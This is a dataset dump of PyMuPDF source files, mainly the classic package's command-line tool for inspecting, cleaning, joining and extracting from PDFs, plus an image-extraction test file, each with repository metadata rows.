if e_rebased is not None:
log(f'{e_rebased=}')
if e_rebased_unoptimised is not None:
log(f'{e_rebased_unoptimised=}')
if e_rebased or e_rebased_unoptimised:
log('Test(s) failed.')
return 1
if __name__ == '__main__':
try:
sys.exit(main())
except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as e:
# Terminate relatively quietly, failed commands will usually have
# generated diagnostics.
log(str(e))
sys.exit(1)
| 3,449 | Python | .py | 96 | 28.197917 | 112 | 0.613837 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,375 | test_extractimage.py | pymupdf_PyMuPDF/tests/test_extractimage.py | """
Extract images from a PDF file, confirm number of images found.
"""
import os
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "joined.pdf")
known_image_count = 21
def test_extract_image():
doc = pymupdf.open(filename)
image_count = 1
for xref in range(1, doc.xref_length() - 1):
if doc.xref_get_key(xref, "Subtype")[1] != "/Image":
continue
img = doc.extract_image(xref)
if isinstance(img, dict):
image_count += 1
assert image_count == known_image_count # this number is know about the file
def test_2348():
pdf_path = f'{scriptdir}/test_2348.pdf'
document = pymupdf.open()
page = document.new_page(width=500, height=842)
rect = pymupdf.Rect(20, 20, 480, 820)
page.insert_image(rect, filename=f'{scriptdir}/resources/nur-ruhig.jpg')
page = document.new_page(width=500, height=842)
page.insert_image(rect, filename=f'{scriptdir}/resources/img-transparent.png')
document.ez_save(pdf_path)
document.close()
document = pymupdf.open(pdf_path)
page = document[0]
imlist = page.get_images()
image = document.extract_image(imlist[0][0])
jpeg_extension = image['ext']
page = document[1]
imlist = page.get_images()
image = document.extract_image(imlist[0][0])
png_extension = image['ext']
print(f'jpeg_extension={jpeg_extension!r} png_extension={png_extension!r}')
assert jpeg_extension == 'jpeg'
assert png_extension == 'png'
def test_delete_image():
doc = pymupdf.open(os.path.abspath(f'{__file__}/../../tests/resources/test_delete_image.pdf'))
page = doc[0]
xref = page.get_images()[0][0]
page.delete_image(xref)
| 1,765 | Python | .py | 45 | 34.133333 | 98 | 0.671176 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,376 | __main__.py | pymupdf_PyMuPDF/src_classic/__main__.py | # -----------------------------------------------------------------------------
# Copyright 2020-2022, Harald Lieder, mailto:harald.lieder@outlook.com
# License: GNU AFFERO GPL 3.0, https://www.gnu.org/licenses/agpl-3.0.html
# Part of "PyMuPDF", Python bindings for "MuPDF" (http://mupdf.com), a
# lightweight PDF, XPS, and E-book viewer, renderer and toolkit which is
# maintained and developed by Artifex Software, Inc. https://artifex.com.
# -----------------------------------------------------------------------------
import argparse
import bisect
import os
import sys
import statistics
from typing import Dict, List, Set, Tuple
import fitz
from fitz.fitz import (
TEXT_INHIBIT_SPACES,
TEXT_PRESERVE_LIGATURES,
TEXT_PRESERVE_WHITESPACE,
)
def mycenter(x):
    """Return *x*, padded with one blank on each side, centered in 75 dashes.

    Used as a section-separator line in console output.
    (Was a lambda bound to a name; PEP 8 E731 prefers a def.)
    """
    return (" %s " % x).center(75, "-")
def recoverpix(doc, item):
    """Return image for a given XREF."""
    xref = item[0]  # xref of PDF image
    smask = item[1]  # xref of its /SMask (0 if none)

    if smask == 0:
        # no soft mask: the embedded image can be extracted directly
        return doc.extract_image(xref)

    def as_rgb(pix):
        # convert 4-component (CMYK-like) pixmaps to RGB, pass others through
        if pix.colorspace.n != 4:
            return pix
        return fitz.Pixmap(fitz.csRGB, pix)

    # reconstruct the alpha channel from the soft mask
    base = fitz.Pixmap(doc, xref)
    mask = fitz.Pixmap(doc, smask)  # pixmap of the /SMask entry

    # Sanity check:
    # - both pixmaps must have the same rectangle
    # - both pixmaps must have alpha=0
    # - the mask must consist of 1 byte per pixel
    supported = (
        base.irect == mask.irect
        and base.alpha == mask.alpha == 0
        and mask.n == 1
    )
    if not supported:
        print("Warning: unsupported /SMask %i for %i:" % (smask, xref))
        print(mask)
        mask = None
        return as_rgb(base)  # return the base pixmap as is

    merged = fitz.Pixmap(base)  # copy of base, with an alpha channel added
    merged.set_alpha(mask.samples)  # treat mask.samples as the alpha values
    base = mask = None  # free temp pixmaps

    # we may need to adjust something for CMYK pixmaps here:
    return as_rgb(merged)
def open_file(filename, password, show=False, pdf=True):
"""Open and authenticate a document."""
doc = fitz.open(filename)
if not doc.is_pdf and pdf is True:
sys.exit("this command supports PDF files only")
rc = -1
if not doc.needs_pass:
return doc
if password:
rc = doc.authenticate(password)
if not rc:
sys.exit("authentication unsuccessful")
if show is True:
print("authenticated as %s" % "owner" if rc > 2 else "user")
else:
sys.exit("'%s' requires a password" % doc.name)
return doc
def print_dict(item):
"""Print a Python dictionary."""
l = max([len(k) for k in item.keys()]) + 1
for k, v in item.items():
msg = "%s: %s" % (k.rjust(l), v)
print(msg)
return
def print_xref(doc, xref):
"""Print an object given by XREF number.
Simulate the PDF source in "pretty" format.
For a stream also print its size.
"""
print("%i 0 obj" % xref)
xref_str = doc.xref_object(xref)
print(xref_str)
if doc.xref_is_stream(xref):
temp = xref_str.split()
try:
idx = temp.index("/Length") + 1
size = temp[idx]
if size.endswith("0 R"):
size = "unknown"
except:
size = "unknown"
print("stream\n...%s bytes" % size)
print("endstream")
print("endobj")
def get_list(rlist, limit, what="page"):
"""Transform a page / xref specification into a list of integers.
Args
----
rlist: (str) the specification
limit: maximum number, i.e. number of pages, number of objects
what: a string to be used in error messages
Returns
-------
A list of integers representing the specification.
"""
N = str(limit - 1)
rlist = rlist.replace("N", N).replace(" ", "")
rlist_arr = rlist.split(",")
out_list = []
for seq, item in enumerate(rlist_arr):
n = seq + 1
if item.isdecimal(): # a single integer
i = int(item)
if 1 <= i < limit:
out_list.append(int(item))
else:
sys.exit("bad %s specification at item %i" % (what, n))
continue
try: # this must be a range now, and all of the following must work:
i1, i2 = item.split("-") # will fail if not 2 items produced
i1 = int(i1) # will fail on non-integers
i2 = int(i2)
except:
sys.exit("bad %s range specification at item %i" % (what, n))
if not (1 <= i1 < limit and 1 <= i2 < limit):
sys.exit("bad %s range specification at item %i" % (what, n))
if i1 == i2: # just in case: a range of equal numbers
out_list.append(i1)
continue
if i1 < i2: # first less than second
out_list += list(range(i1, i2 + 1))
else: # first larger than second
out_list += list(range(i1, i2 - 1, -1))
return out_list
def show(args):
doc = open_file(args.input, args.password, True)
size = os.path.getsize(args.input) / 1024
flag = "KB"
if size > 1000:
size /= 1024
flag = "MB"
size = round(size, 1)
meta = doc.metadata
print(
"'%s', pages: %i, objects: %i, %g %s, %s, encryption: %s"
% (
args.input,
doc.page_count,
doc.xref_length() - 1,
size,
flag,
meta["format"],
meta["encryption"],
)
)
n = doc.is_form_pdf
if n > 0:
s = doc.get_sigflags()
print(
"document contains %i root form fields and is %ssigned"
% (n, "not " if s != 3 else "")
)
n = doc.embfile_count()
if n > 0:
print("document contains %i embedded files" % n)
print()
if args.catalog:
print(mycenter("PDF catalog"))
xref = doc.pdf_catalog()
print_xref(doc, xref)
print()
if args.metadata:
print(mycenter("PDF metadata"))
print_dict(doc.metadata)
print()
if args.xrefs:
print(mycenter("object information"))
xrefl = get_list(args.xrefs, doc.xref_length(), what="xref")
for xref in xrefl:
print_xref(doc, xref)
print()
if args.pages:
print(mycenter("page information"))
pagel = get_list(args.pages, doc.page_count + 1)
for pno in pagel:
n = pno - 1
xref = doc.page_xref(n)
print("Page %i:" % pno)
print_xref(doc, xref)
print()
if args.trailer:
print(mycenter("PDF trailer"))
print(doc.pdf_trailer())
print()
doc.close()
def clean(args):
doc = open_file(args.input, args.password, pdf=True)
encryption = args.encryption
encrypt = ("keep", "none", "rc4-40", "rc4-128", "aes-128", "aes-256").index(
encryption
)
if not args.pages: # simple cleaning
doc.save(
args.output,
garbage=args.garbage,
deflate=args.compress,
pretty=args.pretty,
clean=args.sanitize,
ascii=args.ascii,
linear=args.linear,
encryption=encrypt,
owner_pw=args.owner,
user_pw=args.user,
permissions=args.permission,
)
return
# create sub document from page numbers
pages = get_list(args.pages, doc.page_count + 1)
outdoc = fitz.open()
for pno in pages:
n = pno - 1
outdoc.insert_pdf(doc, from_page=n, to_page=n)
outdoc.save(
args.output,
garbage=args.garbage,
deflate=args.compress,
pretty=args.pretty,
clean=args.sanitize,
ascii=args.ascii,
linear=args.linear,
encryption=encrypt,
owner_pw=args.owner,
user_pw=args.user,
permissions=args.permission,
)
doc.close()
outdoc.close()
return
def doc_join(args):
"""Join pages from several PDF documents."""
doc_list = args.input # a list of input PDFs
doc = fitz.open() # output PDF
for src_item in doc_list: # process one input PDF
src_list = src_item.split(",")
password = src_list[1] if len(src_list) > 1 else None
src = open_file(src_list[0], password, pdf=True)
pages = ",".join(src_list[2:]) # get 'pages' specifications
if pages: # if anything there, retrieve a list of desired pages
page_list = get_list(",".join(src_list[2:]), src.page_count + 1)
else: # take all pages
page_list = range(1, src.page_count + 1)
for i in page_list:
doc.insert_pdf(src, from_page=i - 1, to_page=i - 1) # copy each source page
src.close()
doc.save(args.output, garbage=4, deflate=True)
doc.close()
def embedded_copy(args):
"""Copy embedded files between PDFs."""
doc = open_file(args.input, args.password, pdf=True)
if not doc.can_save_incrementally() and (
not args.output or args.output == args.input
):
sys.exit("cannot save PDF incrementally")
src = open_file(args.source, args.pwdsource)
names = set(args.name) if args.name else set()
src_names = set(src.embfile_names())
if names:
if not names <= src_names:
sys.exit("not all names are contained in source")
else:
names = src_names
if not names:
sys.exit("nothing to copy")
intersect = names & set(doc.embfile_names()) # any equal name already in target?
if intersect:
sys.exit("following names already exist in receiving PDF: %s" % str(intersect))
for item in names:
info = src.embfile_info(item)
buff = src.embfile_get(item)
doc.embfile_add(
item,
buff,
filename=info["filename"],
ufilename=info["ufilename"],
desc=info["desc"],
)
print("copied entry '%s' from '%s'" % (item, src.name))
src.close()
if args.output and args.output != args.input:
doc.save(args.output, garbage=3)
else:
doc.saveIncr()
doc.close()
def embedded_del(args):
"""Delete an embedded file entry."""
doc = open_file(args.input, args.password, pdf=True)
if not doc.can_save_incrementally() and (
not args.output or args.output == args.input
):
sys.exit("cannot save PDF incrementally")
try:
doc.embfile_del(args.name)
except ValueError:
sys.exit("no such embedded file '%s'" % args.name)
if not args.output or args.output == args.input:
doc.save_incr()
else:
doc.save(args.output, garbage=1)
doc.close()
def embedded_get(args):
"""Retrieve contents of an embedded file."""
doc = open_file(args.input, args.password, pdf=True)
try:
stream = doc.embfile_get(args.name)
d = doc.embfile_info(args.name)
except ValueError:
sys.exit("no such embedded file '%s'" % args.name)
filename = args.output if args.output else d["filename"]
output = open(filename, "wb")
output.write(stream)
output.close()
print("saved entry '%s' as '%s'" % (args.name, filename))
doc.close()
def embedded_add(args):
"""Insert a new embedded file."""
doc = open_file(args.input, args.password, pdf=True)
if not doc.can_save_incrementally() and (
args.output is None or args.output == args.input
):
sys.exit("cannot save PDF incrementally")
try:
doc.embfile_del(args.name)
sys.exit("entry '%s' already exists" % args.name)
except:
pass
if not os.path.exists(args.path) or not os.path.isfile(args.path):
sys.exit("no such file '%s'" % args.path)
stream = open(args.path, "rb").read()
filename = args.path
ufilename = filename
if not args.desc:
desc = filename
else:
desc = args.desc
doc.embfile_add(
args.name, stream, filename=filename, ufilename=ufilename, desc=desc
)
if not args.output or args.output == args.input:
doc.saveIncr()
else:
doc.save(args.output, garbage=3)
doc.close()
def embedded_upd(args):
"""Update contents or metadata of an embedded file."""
doc = open_file(args.input, args.password, pdf=True)
if not doc.can_save_incrementally() and (
args.output is None or args.output == args.input
):
sys.exit("cannot save PDF incrementally")
try:
doc.embfile_info(args.name)
except:
sys.exit("no such embedded file '%s'" % args.name)
if (
args.path is not None
and os.path.exists(args.path)
and os.path.isfile(args.path)
):
stream = open(args.path, "rb").read()
else:
stream = None
if args.filename:
filename = args.filename
else:
filename = None
if args.ufilename:
ufilename = args.ufilename
elif args.filename:
ufilename = args.filename
else:
ufilename = None
if args.desc:
desc = args.desc
else:
desc = None
doc.embfile_upd(
args.name, stream, filename=filename, ufilename=ufilename, desc=desc
)
if args.output is None or args.output == args.input:
doc.saveIncr()
else:
doc.save(args.output, garbage=3)
doc.close()
def embedded_list(args):
"""List embedded files."""
doc = open_file(args.input, args.password, pdf=True)
names = doc.embfile_names()
if args.name is not None:
if args.name not in names:
sys.exit("no such embedded file '%s'" % args.name)
else:
print()
print(
"printing 1 of %i embedded file%s:"
% (len(names), "s" if len(names) > 1 else "")
)
print()
print_dict(doc.embfile_info(args.name))
print()
return
if not names:
print("'%s' contains no embedded files" % doc.name)
return
if len(names) > 1:
msg = "'%s' contains the following %i embedded files" % (doc.name, len(names))
else:
msg = "'%s' contains the following embedded file" % doc.name
print(msg)
print()
for name in names:
if not args.detail:
print(name)
continue
_ = doc.embfile_info(name)
print_dict(doc.embfile_info(name))
print()
doc.close()
def extract_objects(args):
"""Extract images and / or fonts from a PDF."""
if not args.fonts and not args.images:
sys.exit("neither fonts nor images requested")
doc = open_file(args.input, args.password, pdf=True)
if args.pages:
pages = get_list(args.pages, doc.page_count + 1)
else:
pages = range(1, doc.page_count + 1)
if not args.output:
out_dir = os.path.abspath(os.curdir)
else:
out_dir = args.output
if not (os.path.exists(out_dir) and os.path.isdir(out_dir)):
sys.exit("output directory %s does not exist" % out_dir)
font_xrefs = set() # already saved fonts
image_xrefs = set() # already saved images
for pno in pages:
if args.fonts:
itemlist = doc.get_page_fonts(pno - 1)
for item in itemlist:
xref = item[0]
if xref not in font_xrefs:
font_xrefs.add(xref)
fontname, ext, _, buffer = doc.extract_font(xref)
if ext == "n/a" or not buffer:
continue
outname = os.path.join(
out_dir, f"{fontname.replace(' ', '-')}-{xref}.{ext}"
)
outfile = open(outname, "wb")
outfile.write(buffer)
outfile.close()
buffer = None
if args.images:
itemlist = doc.get_page_images(pno - 1)
for item in itemlist:
xref = item[0]
if xref not in image_xrefs:
image_xrefs.add(xref)
pix = recoverpix(doc, item)
if type(pix) is dict:
ext = pix["ext"]
imgdata = pix["image"]
outname = os.path.join(out_dir, "img-%i.%s" % (xref, ext))
outfile = open(outname, "wb")
outfile.write(imgdata)
outfile.close()
else:
outname = os.path.join(out_dir, "img-%i.png" % xref)
pix2 = (
pix
if pix.colorspace.n < 4
else fitz.Pixmap(fitz.csRGB, pix)
)
pix2.save(outname)
if args.fonts:
print("saved %i fonts to '%s'" % (len(font_xrefs), out_dir))
if args.images:
print("saved %i images to '%s'" % (len(image_xrefs), out_dir))
doc.close()
def page_simple(page, textout, GRID, fontsize, noformfeed, skip_empty, flags):
eop = b"\n" if noformfeed else bytes([12])
text = page.get_text("text", flags=flags)
if not text:
if not skip_empty:
textout.write(eop) # write formfeed
return
textout.write(text.encode("utf8", errors="surrogatepass"))
textout.write(eop)
return
def page_blocksort(page, textout, GRID, fontsize, noformfeed, skip_empty, flags):
eop = b"\n" if noformfeed else bytes([12])
blocks = page.get_text("blocks", flags=flags)
if blocks == []:
if not skip_empty:
textout.write(eop) # write formfeed
return
blocks.sort(key=lambda b: (b[3], b[0]))
for b in blocks:
textout.write(b[4].encode("utf8", errors="surrogatepass"))
textout.write(eop)
return
def page_layout(page, textout, GRID, fontsize, noformfeed, skip_empty, flags):
eop = b"\n" if noformfeed else bytes([12])
# --------------------------------------------------------------------
def find_line_index(values: List[int], value: int) -> int:
"""Find the right row coordinate.
Args:
values: (list) y-coordinates of rows.
value: (int) lookup for this value (y-origin of char).
Returns:
y-ccordinate of appropriate line for value.
"""
i = bisect.bisect_right(values, value)
if i:
return values[i - 1]
raise RuntimeError("Line for %g not found in %s" % (value, values))
# --------------------------------------------------------------------
def curate_rows(rows: Set[int], GRID) -> List:
rows = list(rows)
rows.sort() # sort ascending
nrows = [rows[0]]
for h in rows[1:]:
if h >= nrows[-1] + GRID: # only keep significant differences
nrows.append(h)
return nrows # curated list of line bottom coordinates
def process_blocks(blocks: List[Dict], page: fitz.Page):
rows = set()
page_width = page.rect.width
page_height = page.rect.height
rowheight = page_height
left = page_width
right = 0
chars = []
for block in blocks:
for line in block["lines"]:
if line["dir"] != (1, 0): # ignore non-horizontal text
continue
x0, y0, x1, y1 = line["bbox"]
if y1 < 0 or y0 > page.rect.height: # ignore if outside CropBox
continue
# upd row height
height = y1 - y0
if rowheight > height:
rowheight = height
for span in line["spans"]:
if span["size"] <= fontsize:
continue
for c in span["chars"]:
x0, _, x1, _ = c["bbox"]
cwidth = x1 - x0
ox, oy = c["origin"]
oy = int(round(oy))
rows.add(oy)
ch = c["c"]
if left > ox and ch != " ":
left = ox # update left coordinate
if right < x1:
right = x1 # update right coordinate
# handle ligatures:
if cwidth == 0 and chars != []: # potential ligature
old_ch, old_ox, old_oy, old_cwidth = chars[-1]
if old_oy == oy: # ligature
if old_ch != chr(0xFB00): # previous "ff" char lig?
lig = joinligature(old_ch + ch) # no
# convert to one of the 3-char ligatures:
elif ch == "i":
lig = chr(0xFB03) # "ffi"
elif ch == "l":
lig = chr(0xFB04) # "ffl"
else: # something wrong, leave old char in place
lig = old_ch
chars[-1] = (lig, old_ox, old_oy, old_cwidth)
continue
chars.append((ch, ox, oy, cwidth)) # all chars on page
return chars, rows, left, right, rowheight
def joinligature(lig: str) -> str:
"""Return ligature character for a given pair / triple of characters.
Args:
lig: (str) 2/3 characters, e.g. "ff"
Returns:
Ligature, e.g. "ff" -> chr(0xFB00)
"""
if lig == "ff":
return chr(0xFB00)
elif lig == "fi":
return chr(0xFB01)
elif lig == "fl":
return chr(0xFB02)
elif lig == "ffi":
return chr(0xFB03)
elif lig == "ffl":
return chr(0xFB04)
elif lig == "ft":
return chr(0xFB05)
elif lig == "st":
return chr(0xFB06)
return lig
# --------------------------------------------------------------------
def make_textline(left, slot, minslot, lchars):
"""Produce the text of one output line.
Args:
left: (float) left most coordinate used on page
slot: (float) avg width of one character in any font in use.
minslot: (float) min width for the characters in this line.
chars: (list[tuple]) characters of this line.
Returns:
text: (str) text string for this line
"""
text = "" # we output this
old_char = ""
old_x1 = 0 # end coordinate of last char
old_ox = 0 # x-origin of last char
if minslot <= fitz.EPSILON:
raise RuntimeError("program error: minslot too small = %g" % minslot)
for c in lchars: # loop over characters
char, ox, _, cwidth = c
ox = ox - left # its (relative) start coordinate
x1 = ox + cwidth # ending coordinate
# eliminate overprint effect
if old_char == char and ox - old_ox <= cwidth * 0.2:
continue
# omit spaces overlapping previous char
if char == " " and (old_x1 - ox) / cwidth > 0.8:
continue
old_char = char
# close enough to previous?
if ox < old_x1 + minslot: # assume char adjacent to previous
text += char # append to output
old_x1 = x1 # new end coord
old_ox = ox # new origin.x
continue
# else next char starts after some gap:
# fill in right number of spaces, so char is positioned
# in the right slot of the line
if char == " ": # rest relevant for non-space only
continue
delta = int(ox / slot) - len(text)
if ox > old_x1 and delta > 1:
text += " " * delta
# now append char
text += char
old_x1 = x1 # new end coordinate
old_ox = ox # new origin
return text.rstrip()
# extract page text by single characters ("rawdict")
blocks = page.get_text("rawdict", flags=flags)["blocks"]
chars, rows, left, right, rowheight = process_blocks(blocks, page)
if chars == []:
if not skip_empty:
textout.write(eop) # write formfeed
return
# compute list of line coordinates - ignoring small (GRID) differences
rows = curate_rows(rows, GRID)
# sort all chars by x-coordinates, so every line will receive char info,
# sorted from left to right.
chars.sort(key=lambda c: c[1])
# populate the lines with their char info
lines = {} # key: y1-ccordinate, value: char list
for c in chars:
_, _, oy, _ = c
y = find_line_index(rows, oy) # y-coord of the right line
lchars = lines.get(y, []) # read line chars so far
lchars.append(c) # append this char
lines[y] = lchars # write back to line
# ensure line coordinates are ascending
keys = list(lines.keys())
keys.sort()
# -------------------------------------------------------------------------
# Compute "char resolution" for the page: the char width corresponding to
# 1 text char position on output - call it 'slot'.
# For each line, compute median of its char widths. The minimum across all
# lines is 'slot'.
# The minimum char width of each line is used to determine if spaces must
# be inserted in between two characters.
# -------------------------------------------------------------------------
slot = right - left
minslots = {}
for k in keys:
lchars = lines[k]
ccount = len(lchars)
if ccount < 2:
minslots[k] = 1
continue
widths = [c[3] for c in lchars]
widths.sort()
this_slot = statistics.median(widths) # take median value
if this_slot < slot:
slot = this_slot
minslots[k] = widths[0]
# compute line advance in text output
rowheight = rowheight * (rows[-1] - rows[0]) / (rowheight * len(rows)) * 1.2
rowpos = rows[0] # first line positioned here
textout.write(b"\n")
for k in keys: # walk through the lines
while rowpos < k: # honor distance between lines
textout.write(b"\n")
rowpos += rowheight
text = make_textline(left, slot, minslots[k], lines[k])
textout.write((text + "\n").encode("utf8", errors="surrogatepass"))
rowpos = k + rowheight
textout.write(eop) # write formfeed
def gettext(args):
doc = open_file(args.input, args.password, pdf=False)
pagel = get_list(args.pages, doc.page_count + 1)
output = args.output
if output == None:
filename, _ = os.path.splitext(doc.name)
output = filename + ".txt"
textout = open(output, "wb")
flags = TEXT_PRESERVE_LIGATURES | TEXT_PRESERVE_WHITESPACE
if args.convert_white:
flags ^= TEXT_PRESERVE_WHITESPACE
if args.noligatures:
flags ^= TEXT_PRESERVE_LIGATURES
if args.extra_spaces:
flags ^= TEXT_INHIBIT_SPACES
func = {
"simple": page_simple,
"blocks": page_blocksort,
"layout": page_layout,
}
for pno in pagel:
page = doc[pno - 1]
func[args.mode](
page,
textout,
args.grid,
args.fontsize,
args.noformfeed,
args.skip_empty,
flags=flags,
)
textout.close()
def main():
"""Define command configurations."""
parser = argparse.ArgumentParser(
prog="fitz",
description=mycenter("Basic PyMuPDF Functions"),
)
subps = parser.add_subparsers(
title="Subcommands", help="Enter 'command -h' for subcommand specific help"
)
# -------------------------------------------------------------------------
# 'show' command
# -------------------------------------------------------------------------
ps_show = subps.add_parser("show", description=mycenter("display PDF information"))
ps_show.add_argument("input", type=str, help="PDF filename")
ps_show.add_argument("-password", help="password")
ps_show.add_argument("-catalog", action="store_true", help="show PDF catalog")
ps_show.add_argument("-trailer", action="store_true", help="show PDF trailer")
ps_show.add_argument("-metadata", action="store_true", help="show PDF metadata")
ps_show.add_argument(
"-xrefs", type=str, help="show selected objects, format: 1,5-7,N"
)
ps_show.add_argument(
"-pages", type=str, help="show selected pages, format: 1,5-7,50-N"
)
ps_show.set_defaults(func=show)
# -------------------------------------------------------------------------
# 'clean' command
# -------------------------------------------------------------------------
ps_clean = subps.add_parser(
"clean", description=mycenter("optimize PDF, or create sub-PDF if pages given")
)
ps_clean.add_argument("input", type=str, help="PDF filename")
ps_clean.add_argument("output", type=str, help="output PDF filename")
ps_clean.add_argument("-password", help="password")
ps_clean.add_argument(
"-encryption",
help="encryption method",
choices=("keep", "none", "rc4-40", "rc4-128", "aes-128", "aes-256"),
default="none",
)
ps_clean.add_argument("-owner", type=str, help="owner password")
ps_clean.add_argument("-user", type=str, help="user password")
ps_clean.add_argument(
"-garbage",
type=int,
help="garbage collection level",
choices=range(5),
default=0,
)
ps_clean.add_argument(
"-compress",
action="store_true",
default=False,
help="compress (deflate) output",
)
ps_clean.add_argument(
"-ascii", action="store_true", default=False, help="ASCII encode binary data"
)
ps_clean.add_argument(
"-linear",
action="store_true",
default=False,
help="format for fast web display",
)
ps_clean.add_argument(
"-permission", type=int, default=-1, help="integer with permission levels"
)
ps_clean.add_argument(
"-sanitize",
action="store_true",
default=False,
help="sanitize / clean contents",
)
ps_clean.add_argument(
"-pretty", action="store_true", default=False, help="prettify PDF structure"
)
ps_clean.add_argument(
"-pages", help="output selected pages pages, format: 1,5-7,50-N"
)
ps_clean.set_defaults(func=clean)
# -------------------------------------------------------------------------
# 'join' command
# -------------------------------------------------------------------------
ps_join = subps.add_parser(
"join",
description=mycenter("join PDF documents"),
epilog="specify each input as 'filename[,password[,pages]]'",
)
ps_join.add_argument("input", nargs="*", help="input filenames")
ps_join.add_argument("-output", required=True, help="output filename")
ps_join.set_defaults(func=doc_join)
# -------------------------------------------------------------------------
# 'extract' command
# -------------------------------------------------------------------------
ps_extract = subps.add_parser(
"extract", description=mycenter("extract images and fonts to disk")
)
ps_extract.add_argument("input", type=str, help="PDF filename")
ps_extract.add_argument("-images", action="store_true", help="extract images")
ps_extract.add_argument("-fonts", action="store_true", help="extract fonts")
ps_extract.add_argument(
"-output", help="folder to receive output, defaults to current"
)
ps_extract.add_argument("-password", help="password")
ps_extract.add_argument(
"-pages", type=str, help="consider these pages only, format: 1,5-7,50-N"
)
ps_extract.set_defaults(func=extract_objects)
# -------------------------------------------------------------------------
# 'embed-info'
# -------------------------------------------------------------------------
ps_show = subps.add_parser(
"embed-info", description=mycenter("list embedded files")
)
ps_show.add_argument("input", help="PDF filename")
ps_show.add_argument("-name", help="if given, report only this one")
ps_show.add_argument("-detail", action="store_true", help="detail information")
ps_show.add_argument("-password", help="password")
ps_show.set_defaults(func=embedded_list)
# -------------------------------------------------------------------------
# 'embed-add' command
# -------------------------------------------------------------------------
ps_embed_add = subps.add_parser(
"embed-add", description=mycenter("add embedded file")
)
ps_embed_add.add_argument("input", help="PDF filename")
ps_embed_add.add_argument("-password", help="password")
ps_embed_add.add_argument(
"-output", help="output PDF filename, incremental save if none"
)
ps_embed_add.add_argument("-name", required=True, help="name of new entry")
ps_embed_add.add_argument("-path", required=True, help="path to data for new entry")
ps_embed_add.add_argument("-desc", help="description of new entry")
ps_embed_add.set_defaults(func=embedded_add)
# -------------------------------------------------------------------------
# 'embed-del' command
# -------------------------------------------------------------------------
ps_embed_del = subps.add_parser(
"embed-del", description=mycenter("delete embedded file")
)
ps_embed_del.add_argument("input", help="PDF filename")
ps_embed_del.add_argument("-password", help="password")
ps_embed_del.add_argument(
"-output", help="output PDF filename, incremental save if none"
)
ps_embed_del.add_argument("-name", required=True, help="name of entry to delete")
ps_embed_del.set_defaults(func=embedded_del)
# -------------------------------------------------------------------------
# 'embed-upd' command
# -------------------------------------------------------------------------
ps_embed_upd = subps.add_parser(
"embed-upd",
description=mycenter("update embedded file"),
epilog="except '-name' all parameters are optional",
)
ps_embed_upd.add_argument("input", help="PDF filename")
ps_embed_upd.add_argument("-name", required=True, help="name of entry")
ps_embed_upd.add_argument("-password", help="password")
ps_embed_upd.add_argument(
"-output", help="Output PDF filename, incremental save if none"
)
ps_embed_upd.add_argument("-path", help="path to new data for entry")
ps_embed_upd.add_argument("-filename", help="new filename to store in entry")
ps_embed_upd.add_argument(
"-ufilename", help="new unicode filename to store in entry"
)
ps_embed_upd.add_argument("-desc", help="new description to store in entry")
ps_embed_upd.set_defaults(func=embedded_upd)
# -------------------------------------------------------------------------
# 'embed-extract' command
# -------------------------------------------------------------------------
ps_embed_extract = subps.add_parser(
"embed-extract", description=mycenter("extract embedded file to disk")
)
ps_embed_extract.add_argument("input", type=str, help="PDF filename")
ps_embed_extract.add_argument("-name", required=True, help="name of entry")
ps_embed_extract.add_argument("-password", help="password")
ps_embed_extract.add_argument(
"-output", help="output filename, default is stored name"
)
ps_embed_extract.set_defaults(func=embedded_get)
# -------------------------------------------------------------------------
# 'embed-copy' command
# -------------------------------------------------------------------------
ps_embed_copy = subps.add_parser(
"embed-copy", description=mycenter("copy embedded files between PDFs")
)
ps_embed_copy.add_argument("input", type=str, help="PDF to receive embedded files")
ps_embed_copy.add_argument("-password", help="password of input")
ps_embed_copy.add_argument(
"-output", help="output PDF, incremental save to 'input' if omitted"
)
ps_embed_copy.add_argument(
"-source", required=True, help="copy embedded files from here"
)
ps_embed_copy.add_argument("-pwdsource", help="password of 'source' PDF")
ps_embed_copy.add_argument(
"-name", nargs="*", help="restrict copy to these entries"
)
ps_embed_copy.set_defaults(func=embedded_copy)
# -------------------------------------------------------------------------
# 'textlayout' command
# -------------------------------------------------------------------------
ps_gettext = subps.add_parser(
"gettext", description=mycenter("extract text in various formatting modes")
)
ps_gettext.add_argument("input", type=str, help="input document filename")
ps_gettext.add_argument("-password", help="password for input document")
ps_gettext.add_argument(
"-mode",
type=str,
help="mode: simple, block sort, or layout (default)",
choices=("simple", "blocks", "layout"),
default="layout",
)
ps_gettext.add_argument(
"-pages",
type=str,
help="select pages, format: 1,5-7,50-N",
default="1-N",
)
ps_gettext.add_argument(
"-noligatures",
action="store_true",
help="expand ligature characters (default False)",
default=False,
)
ps_gettext.add_argument(
"-convert-white",
action="store_true",
help="convert whitespace characters to white (default False)",
default=False,
)
ps_gettext.add_argument(
"-extra-spaces",
action="store_true",
help="fill gaps with spaces (default False)",
default=False,
)
ps_gettext.add_argument(
"-noformfeed",
action="store_true",
help="write linefeeds, no formfeeds (default False)",
default=False,
)
ps_gettext.add_argument(
"-skip-empty",
action="store_true",
help="suppress pages with no text (default False)",
default=False,
)
ps_gettext.add_argument(
"-output",
help="store text in this file (default inputfilename.txt)",
)
ps_gettext.add_argument(
"-grid",
type=float,
help="merge lines if closer than this (default 2)",
default=2,
)
ps_gettext.add_argument(
"-fontsize",
type=float,
help="only include text with a larger fontsize (default 3)",
default=3,
)
ps_gettext.set_defaults(func=gettext)
# -------------------------------------------------------------------------
# start program
# -------------------------------------------------------------------------
args = parser.parse_args() # create parameter arguments class
if not hasattr(args, "func"): # no function selected
parser.print_help() # so print top level help
else:
args.func(args) # execute requested command
if __name__ == "__main__":
main()
| 39,739 | Python | .py | 1,019 | 30.212954 | 88 | 0.542108 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,377 | helper-python.i | pymupdf_PyMuPDF/src_classic/helper-python.i | %pythoncode %{
# ------------------------------------------------------------------------
# Copyright 2020-2022, Harald Lieder, mailto:harald.lieder@outlook.com
# License: GNU AFFERO GPL 3.0, https://www.gnu.org/licenses/agpl-3.0.html
#
# Part of "PyMuPDF", a Python binding for "MuPDF" (http://mupdf.com), a
